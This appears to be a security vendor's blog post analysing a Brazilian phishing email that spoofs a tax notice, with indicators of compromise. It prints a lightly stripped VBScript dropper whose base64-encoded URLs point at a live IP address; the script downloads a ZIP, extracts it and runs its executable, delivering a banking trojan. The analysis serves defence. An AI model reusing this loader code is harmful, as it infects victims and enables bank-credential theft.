It’s a Small World After All

The other day I decided to take a walkabout in our data and explore what the rest of the world sees. And it didn’t take long to find a poorly constructed Brazilian tax note phish spoofing their Ministry of Economy. The actor failed with his phish template and switches between an invoice phish and a tax note phish.

As you have probably guessed, that link does not go to the Ministry of Economy nor is it an electronic tax note. In fact, it downloads a ZIP file containing a VBScript. The script is minimally obfuscated and rather simple, so I will only provide a stripped-down version.

Set objShellSW = CreateObject( "WScript.Shell" )    
noqrtvvwyyABBDEEGIJ =objShellSW.ExpandEnvironmentStrings("%APPDATA%")
Set wshShell = CreateObject("WScript.Shell")
BBDEGIIJLNNOQQRTTV = noqrtvvwyyABBDEEGIJ +"\realteknv"
Exit_if_BBDEGIIJLNNOQQRTTV_exists
msgbox "   FILE  NOT  FOUND    "  ,vbInformation,"Windows"
Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
oFSO.CreateFolder BBDEGIIJLNNOQQRTTV
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
NPQQUUVXXZaacdffhi = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
download_payload
ZipFile = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
ExtractTo = BBDEGIIJLNNOQQRTTV & "./"
Set fso = CreateObject("Scripting.FileSystemObject")
sourceFile = fso.GetAbsolutePathName(ZipFile)
destFolder = fso.GetAbsolutePathName(ExtractTo)
Set objShell = CreateObject("Shell.Application")
Set FilesInZip=objShell.NameSpace(sourceFile).Items()
objShell.NameSpace(destFolder).copyHere FilesInZip, 4
Set objFSOx = Createobject("Scripting.FileSystemObject")
If objFSOx.Fileexists(BBDEGIIJLNNOQQRTTV  & "\tvvwyABBDEGGIJJL.zip") Then objFSOx.DeleteFile BBDEGIIJLNNOQQRTTV  & "\tvvwyABBDEGGIJJL.zip"
Set objFSOw = CreateObject("Scripting.FileSystemObject")
objStartFolder = BBDEGIIJLNNOQQRTTV
Set objFolder = objFSOw.GetFolder(objStartFolder)
Set colFiles = objFolder.Files
Dim objShellLM
Set objShellLM = WScript.CreateObject( "WScript.Shell" )
For Each objFile in colFiles
If UCase(objFSOw.GetExtensionName(objFile.name)) = "EXE" Then
wyABDFFGIIJLNNOQQST = Replace(objFile.Name,".exe","")                                               
ffgiklnnpqsstvvxy = BBDEGIIJLNNOQQRTTV & "\" & objFile.Name
objShellLM.Exec(ffgiklnnpqsstvvxy)
End If
Next
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", Zbccgghjjlmmoqrrtu, False
o.send

The script starts by base64 decoding those two strings, which decode to (1) hxxp://3.81.170[.]195/grl/ and (2) hxxp://3.81.170[.]195/bc5279e8-34ac-4d16-a8f2-b9bd90448a0.zip. Then it downloads the payload from (1), extracts the EXE from the ZIP archive, removes the extension, and executes the payload. And, finally, it sends a GET request to (2).

And what sort of goodness does that payload deliver. Well it is a Brazilian phish so you would be correct if you said generic Delphi based Brazilian banking trojan. Many anti-virus vendors label them Banload, Boleto, or Delf.

IOCTypeNotes
3.81.170.195 IP AddressC2 Address
dcd9ce1d719c4c7f3a06aaf320dd57f20fd9c228f21d56b118b1d28a726eecaeSHA256Zip file
6c1708f6d07e2f947f1e9cf1df24d0ba3d43a87c58c4c066a67072daeb73c61bSHA256VBScript
1085cc04386f819f56f56ce15f63bff09336b44785ab93e7f75c073282c07e6cSHA256Banking trojan

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.